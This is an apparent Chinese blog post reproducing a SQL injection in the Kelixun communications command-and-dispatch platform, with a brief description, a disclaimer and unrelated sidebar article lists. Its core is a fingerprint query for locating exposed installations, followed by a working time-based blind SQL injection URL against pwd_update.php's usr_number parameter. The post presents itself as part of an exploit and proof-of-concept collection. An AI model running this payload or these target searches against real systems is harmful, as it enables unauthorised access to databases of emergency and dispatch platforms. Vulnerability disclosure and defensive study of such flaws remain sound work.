【漏洞复现】科立讯通信指挥调度平台editemedia.php sql注入漏洞

漏洞描述

在20240318之前的福建科立讯通信指挥调度平台中发现了一个漏洞。该漏洞被归类为关键级别,影响文件/api/client/editemedia.php的未知部分。通过操纵参数number/enterprise_uuid可导致SQL注入。攻击可能会远程发起。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞集合

【传送点】上千漏洞复现复现集合 exp poc 持续更新

资产确定

body="app/structure/departments.php" || app="指挥调度管理平台"

漏洞复现

多个注入点

/api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%

最近更新

  1. TCP协议是安全的吗?

    2024-03-26 10:02:01       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-26 10:02:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-03-26 10:02:01       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-03-26 10:02:01       20 阅读

热门阅读

  1. MySQL数据结构B树与B+树的区别

    2024-03-26 10:02:01       22 阅读
  2. Rust 的 HashMap 特定键值元素值的累加方法

    2024-03-26 10:02:01       20 阅读
  3. 007、IronPython与.NET Framework

    2024-03-26 10:02:01       17 阅读
  4. Matlab中mpower函数用法

    2024-03-26 10:02:01       19 阅读
  5. Zookeeper 的通知机制

    2024-03-26 10:02:01       23 阅读
  6. BC98 序列中删除指定数字

    2024-03-26 10:02:01       18 阅读
  7. 软件工程---专业名称

    2024-03-26 10:02:01       19 阅读
  8. ADC123123

    2024-03-26 10:02:01       21 阅读